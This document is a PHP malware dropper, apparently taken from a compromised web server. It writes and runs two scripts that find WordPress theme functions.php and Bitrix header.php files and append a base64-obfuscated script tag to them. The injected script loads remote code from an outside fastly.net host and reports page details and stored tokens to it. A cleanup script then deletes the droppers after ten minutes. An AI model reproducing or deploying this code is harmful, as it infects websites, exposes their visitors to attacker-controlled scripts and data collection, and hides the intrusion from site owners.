Your IP : 18.218.214.121
<?php
$codeWP = '<?php
function findAccessiblePaths($path) {
$parts = explode("/", $path);
$currentPath = "/";
$accessiblePaths = [];
foreach ($parts as $part) {
if (!empty($part)) {
$currentPath .= $part . "/";
if (is_readable($currentPath)) {
$accessiblePaths[] = $currentPath;
}
}
}
return $accessiblePaths;
}
function findWpThemesCrossPlatform() {
$cwd = getcwd();
$accessiblePaths = findAccessiblePaths($cwd);
$allModifiedFiles = [];
foreach ($accessiblePaths as $path) {
$command = getSearchCommand($path);
$output = shell_exec($command);
$functionsPaths = [];
if ($output) {
$paths = preg_split("/\r\n|\r|\n/", trim($output));
foreach ($paths as $path) {
$foundPaths = findFilesRecursively($path, "functions.php");
$functionsPaths = array_merge($functionsPaths, $foundPaths);
}
}
$modifiedFiles = addCustomScriptToFiles($functionsPaths);
if (!empty($modifiedFiles)) {
$allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
break;
}
}
if (empty($allModifiedFiles)) {
echo "No themes modified or accessible";
} else {
print_r($allModifiedFiles);
}
}
function addCustomScriptToFiles(array $functionsPaths) {
$modifiedFiles = [];
$newFunctionCode = getCustomScript();
foreach ($functionsPaths as $functionsPath) {
if (file_exists($functionsPath) && is_writable($functionsPath)) {
$code = file_get_contents($functionsPath);
if (strpos($code, "wp_system_query_script") === false) {
$code .= "\n" . $newFunctionCode;
file_put_contents($functionsPath, $code);
$modifiedFiles[] = $functionsPath;
}
}
}
return $modifiedFiles;
}
function getCustomScript() {
return <<<PHP
function wp_system_query_script() {
?>
<script src="data:text/javascript;base64,CiAgICAoZnVuY3Rpb24oKSB7CiAgICB2YXIgbmFtZSA9ICdfZHNITXlGaHlYWXc4cWh4Zyc7CiAgICBpZiAoIXdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZykgewogICAgICAgIHdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZyA9IHsKICAgICAgICAgICAgdW5pcXVlOiBmYWxzZSwKICAgICAgICAgICAgdHRsOiA4NjQwMCwKICAgICAgICAgICAgUl9QQVRIOiAnaHR0cHM6Ly9iYnRycmFjay5nbG9iYWwuc3NsLmZhc3RseS5uZXQvVDQ5THN3JywKICAgICAgICB9OwogICAgfQogICAgY29uc3QgX215WUNrR0RNUDlqcU5DRHQgPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnY29uZmlnJyk7CiAgICBpZiAodHlwZW9mIF9teVlDa0dETVA5anFOQ0R0ICE9PSAndW5kZWZpbmVkJyAmJiBfbXlZQ2tHRE1QOWpxTkNEdCAhPT0gbnVsbCkgewogICAgICAgIHZhciBfS1BxczhnWDZQWGdOVGgzViA9IEpTT04ucGFyc2UoX215WUNrR0RNUDlqcU5DRHQpOwogICAgICAgIHZhciBfUDhEWUJCczlZOVBIU3RNNiA9IE1hdGgucm91bmQoK25ldyBEYXRlKCkvMTAwMCk7CiAgICAgICAgaWYgKF9LUHFzOGdYNlBYZ05UaDNWLmNyZWF0ZWRfYXQgKyB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudHRsIDwgX1A4RFlCQnM5WTlQSFN0TTYpIHsKICAgICAgICAgICAgbG9jYWxTdG9yYWdlLnJlbW92ZUl0ZW0oJ3N1YklkJyk7CiAgICAgICAgICAgIGxvY2FsU3RvcmFnZS5yZW1vdmVJdGVtKCd0b2tlbicpOwogICAgICAgICAgICBsb2NhbFN0b3JhZ2UucmVtb3ZlSXRlbSgnY29uZmlnJyk7CiAgICAgICAgfQogICAgfQogICAgdmFyIF93R3AycnRwampyeGpLTUJHID0gbG9jYWxTdG9yYWdlLmdldEl0ZW0oJ3N1YklkJyk7CiAgICB2YXIgX3h3Q2pMM3FxUXozQmdUSk4gPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgndG9rZW4nKTsKICAgIHZhciBfckZEa05XUzd5S0o3NHlDUCA9ICc/cmV0dXJuPWpzLmNsaWVudCc7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyYnICsgZGVjb2RlVVJJQ29tcG9uZW50KHdpbmRvdy5sb2NhdGlvbi5zZWFyY2gucmVwbGFjZSgnPycsICcnKSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzZV9yZWZlcnJlcj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnJlZmVycmVyKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmRlZmF1bHRfa2V5d29yZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnRpdGxlKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmxhbmRpbmdfdXJsPScgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUgKyBkb2N1bWVudC5sb2NhdGlvbi5wYXRobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZuYW1lPScgKyBlbmNvZGVVUklDb21wb25lbnQobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZob3N0PScgKyBlbmNvZGVVUklDb21wb25lbnQod2luZG93Ll9kc0hNeUZoeVhZdzhxaHhnLlJfUEFUSCk7CiAgICBpZiAodHlwZW9mIF93R3AycnRwampyeGpLTUJHICE9PSAndW5kZWZpbmVkJyAmJiBfd0dwMnJ0cGpqcnhqS01CRyAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzdWJfaWQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChfd0dwMnJ0cGpqcnhqS01CRyk7CiAgICB9CiAgICBpZiAodHlwZW9mIF94d0NqTDNxcVF6M0JnVEpOICE9PSAndW5kZWZpbmVkJyAmJiBfeHdDakwzcXFRejNCZ1RKTiAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZ0b2tlbj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KF94d0NqTDNxcVF6M0JnVEpOKTsKICAgIH0KICAgIGlmICgnJyAhPT0gJycpIHsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmJ5cGFzc19jYWNoZT0nOwogICAgfQogICAgdmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBhLnR5cGUgPSAnYXBwbGljYXRpb24vamF2YXNjcmlwdCc7CiAgICAgICAgYS5zcmMgPSB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcuUl9QQVRIICsgX3JGRGtOV1M3eUtKNzR5Q1A7CiAgICB2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsKICAgIHMucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYSwgcykKICAgIH0pKCk7CiAgICA="></script>
<?php
}
add_action("wp_footer", "wp_system_query_script");
add_action("wp_body_open", "wp_system_query_script");
PHP;
}
function getSearchCommand($startPath) {
$os = strtoupper(substr(PHP_OS, 0, 3));
if ($os === "WIN") {
return "dir /s /b /a:d {$startPath}*wp-content\\themes*";
} else {
return "find {$startPath} -type d -name \'themes\' -path \'*/wp-content/themes\' 2>/dev/null";
}
}
function findFilesRecursively($dir, $fileName) {
$results = [];
$files = scandir($dir);
foreach ($files as $file) {
if ($file !== "." && $file !== "..") {
$path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($path)) {
$results = array_merge($results, findFilesRecursively($path, $fileName));
} elseif ($file === $fileName) {
$results[] = $path;
}
}
}
return $results;
}
findWpThemesCrossPlatform();
die();
?>';
$codeBT = '<?php
function findAccessiblePaths($path)
{
$parts = explode("/", $path);
$currentPath = "/";
$accessiblePaths = [];
foreach ($parts as $part) {
if (!empty($part)) {
$currentPath .= $part . "/";
if (is_readable($currentPath)) {
$accessiblePaths[] = $currentPath;
}
}
}
return $accessiblePaths;
}
function modifyBitrixTemplates()
{
$cwd = getcwd();
$accessiblePaths = findAccessiblePaths($cwd);
$allModifiedFiles = [];
foreach ($accessiblePaths as $path) {
$command = getSearchCommand($path);
$output = shell_exec($command);
$templatePaths = [];
if ($output) {
$paths = preg_split("/\r\n|\r|\n/", trim($output));
foreach ($paths as $path) {
$foundPaths = findFilesRecursively($path, "header.php"); // Example file in a Bitrix template
$templatePaths = array_merge($templatePaths, $foundPaths);
}
}
$modifiedFiles = addCustomScriptToFiles($templatePaths);
if (!empty($modifiedFiles)) {
$allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
break;
}
}
if (empty($allModifiedFiles)) {
echo "No templates modified or accessible";
} else {
echo print_r($allModifiedFiles);
}
}
function addCustomScriptToFiles(array $templatePaths)
{
$modifiedFiles = [];
$newFunctionCode = getCustomScript();
foreach ($templatePaths as $templatePath) {
if (file_exists($templatePath) && is_writable($templatePath)) {
$code = file_get_contents($templatePath);
if (strpos($code, "custom_query_script") === false) {
$code .= "\n" . $newFunctionCode;
file_put_contents($templatePath, $code);
$modifiedFiles[] = $templatePath;
}
}
}
return $modifiedFiles;
}
function getCustomScript()
{
return <<<HTML
<script src="data:text/javascript;base64,CiAgICAoZnVuY3Rpb24oKSB7CiAgICB2YXIgbmFtZSA9ICdfZHNITXlGaHlYWXc4cWh4Zyc7CiAgICBpZiAoIXdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZykgewogICAgICAgIHdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZyA9IHsKICAgICAgICAgICAgdW5pcXVlOiBmYWxzZSwKICAgICAgICAgICAgdHRsOiA4NjQwMCwKICAgICAgICAgICAgUl9QQVRIOiAnaHR0cHM6Ly9iYnRycmFjay5nbG9iYWwuc3NsLmZhc3RseS5uZXQvVDQ5THN3JywKICAgICAgICB9OwogICAgfQogICAgY29uc3QgX215WUNrR0RNUDlqcU5DRHQgPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnY29uZmlnJyk7CiAgICBpZiAodHlwZW9mIF9teVlDa0dETVA5anFOQ0R0ICE9PSAndW5kZWZpbmVkJyAmJiBfbXlZQ2tHRE1QOWpxTkNEdCAhPT0gbnVsbCkgewogICAgICAgIHZhciBfS1BxczhnWDZQWGdOVGgzViA9IEpTT04ucGFyc2UoX215WUNrR0RNUDlqcU5DRHQpOwogICAgICAgIHZhciBfUDhEWUJCczlZOVBIU3RNNiA9IE1hdGgucm91bmQoK25ldyBEYXRlKCkvMTAwMCk7CiAgICAgICAgaWYgKF9LUHFzOGdYNlBYZ05UaDNWLmNyZWF0ZWRfYXQgKyB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudHRsIDwgX1A4RFlCQnM5WTlQSFN0TTYpIHsKICAgICAgICAgICAgbG9jYWxTdG9yYWdlLnJlbW92ZUl0ZW0oJ3N1YklkJyk7CiAgICAgICAgICAgIGxvY2FsU3RvcmFnZS5yZW1vdmVJdGVtKCd0b2tlbicpOwogICAgICAgICAgICBsb2NhbFN0b3JhZ2UucmVtb3ZlSXRlbSgnY29uZmlnJyk7CiAgICAgICAgfQogICAgfQogICAgdmFyIF93R3AycnRwampyeGpLTUJHID0gbG9jYWxTdG9yYWdlLmdldEl0ZW0oJ3N1YklkJyk7CiAgICB2YXIgX3h3Q2pMM3FxUXozQmdUSk4gPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgndG9rZW4nKTsKICAgIHZhciBfckZEa05XUzd5S0o3NHlDUCA9ICc/cmV0dXJuPWpzLmNsaWVudCc7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyYnICsgZGVjb2RlVVJJQ29tcG9uZW50KHdpbmRvdy5sb2NhdGlvbi5zZWFyY2gucmVwbGFjZSgnPycsICcnKSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzZV9yZWZlcnJlcj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnJlZmVycmVyKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmRlZmF1bHRfa2V5d29yZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnRpdGxlKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmxhbmRpbmdfdXJsPScgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUgKyBkb2N1bWVudC5sb2NhdGlvbi5wYXRobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZuYW1lPScgKyBlbmNvZGVVUklDb21wb25lbnQobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZob3N0PScgKyBlbmNvZGVVUklDb21wb25lbnQod2luZG93Ll9kc0hNeUZoeVhZdzhxaHhnLlJfUEFUSCk7CiAgICBpZiAodHlwZW9mIF93R3AycnRwampyeGpLTUJHICE9PSAndW5kZWZpbmVkJyAmJiBfd0dwMnJ0cGpqcnhqS01CRyAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzdWJfaWQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChfd0dwMnJ0cGpqcnhqS01CRyk7CiAgICB9CiAgICBpZiAodHlwZW9mIF94d0NqTDNxcVF6M0JnVEpOICE9PSAndW5kZWZpbmVkJyAmJiBfeHdDakwzcXFRejNCZ1RKTiAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZ0b2tlbj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KF94d0NqTDNxcVF6M0JnVEpOKTsKICAgIH0KICAgIGlmICgnJyAhPT0gJycpIHsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmJ5cGFzc19jYWNoZT0nOwogICAgfQogICAgdmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBhLnR5cGUgPSAnYXBwbGljYXRpb24vamF2YXNjcmlwdCc7CiAgICAgICAgYS5zcmMgPSB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcuUl9QQVRIICsgX3JGRGtOV1M3eUtKNzR5Q1A7CiAgICB2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsKICAgIHMucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYSwgcykKICAgIH0pKCk7CiAgICA="></script>
HTML;
}
function getSearchCommand($startPath)
{
$os = strtoupper(substr(PHP_OS, 0, 3));
if ($os === "WIN") {
return "dir /s /b /a:d {$startPath}*bitrix*";
} else {
return "find {$startPath} -type d -name \'bitrix\' -path \'*/bitrix\' 2>/dev/null";
}
}
function findFilesRecursively($dir, $fileName)
{
$results = [];
$files = scandir($dir);
foreach ($files as $file) {
if ($file !== "." && $file !== "..") {
$path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($path)) {
$results = array_merge($results, findFilesRecursively($path, $fileName));
} elseif ($file === $fileName) {
$results[] = $path;
}
}
}
return $results;
}
modifyBitrixTemplates();
die();
?>';
$del = <<<PHP
<?php
unlink('wp.php');
unlink('bt.php');
unlink('wpbtStart.php');
?>
PHP;
file_put_contents('wp.php', $codeWP);
file_put_contents('bt.php', $codeBT);
file_put_contents('del.php', $del);
$os = strtoupper(substr(PHP_OS, 0, 3));
if ($os === "WIN") {
shell_exec("start /B php wp.php > log_wp.txt 2>&1");
shell_exec("start /B php bt.php > log_bt.txt 2>&1");
shell_exec("Start-Sleep -Seconds 600; Start-Process 'php' -ArgumentList 'del.php' -NoNewWindow");
} else {
shell_exec("php wp.php > log_wp.txt 2>&1 &");
shell_exec("php bt.php > log_bt.txt 2>&1 &");
shell_exec("(sleep 600 && php del.php) > /dev/null 2>&1 &");
}
?>